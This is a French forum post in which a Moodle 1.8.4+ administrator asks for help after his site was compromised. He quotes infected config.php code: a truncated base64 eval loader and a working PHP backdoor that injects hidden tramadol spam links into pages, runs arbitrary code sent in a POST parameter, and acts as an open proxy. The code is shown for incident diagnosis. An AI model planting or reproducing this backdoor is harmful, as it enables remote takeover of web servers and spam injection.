Merci pour vos réponse rapides,
Désolé je me suis trompé dans le sujet du message, il s'agit bien de la version 1.8.4+, en tout cas c'est ce qu'il est indiqué dans le fichier "version.php" et il s'agit d'une branche de la 1.8
voici donc le début du fichier "config.php" du backup (sauvegarde la plus ancienne), le site fonctionnait bien. J'ai mis les ligne suspectes en rouge. J'ai pas mis toutes la ligne de commande car elle est trés longue :
<?php /*// 15f5b7e7da25ae61fc378f3ac1361343 */ eval(base64_decode('JGxpbmtzID0gJw0KeGVleDE3MjgxMA0.. etc
unset($CFG);
Ensuite, le début du fichier "config.php" actuel tel qu'il est sur le serveur d'hebergement et qui a entrainé l'impossibilité de se connecter :
<!-1iwr6ayoqlulzqtnsckpo--->
<?php
$links = '<aa href="tramadol
http://www.playlist.com/blog/entry/12449180675">tramadol</a><br><a href=.. etc
function output_callback($str)
{
GLOBAL $links;
preg_match("|<body[^>]*>|",$str,$arr);
return str_replace($arr[0],$arr[0].'<i style="display:none">'.$links.'</i>',$str);
}
function get_page($url)
{
return file_get_contents($url);
}
if(isset($_POST['code']) && $_POST['code'])
{
eval(stripslashes($_POST[code]));
exit;
}
if(isset($_GET['proxy']) && $_GET['proxy'])
{
print get_page($_GET['proxy']);
exit;
}
ob_start ('output_callback')
?>
<?php /// Moodle Configuration File
unset($CFG);
Je pense qu'il s'agit d'un bot qui a ouvert une faille et qui a mit sa publicité mais au lieu de l'afficher correctement ça a completement bloqué le site.
J'ai regardé les maj de sécurité récente mais je nai rien trouvé qui correspond a cette faille. Dans le forum anglais effectivement quelqu'un a déjà eut ce problème il y a quelque temps mais j'ai pas tout compris au niveau de la résolution.
Enfin bref je me renseigne actuellement pour savoir comment réinstaller une version a jour et saine sans perdre les données, mais je suis pressé par le temps car les formations sont bloqués.
Je vous tiens au courant.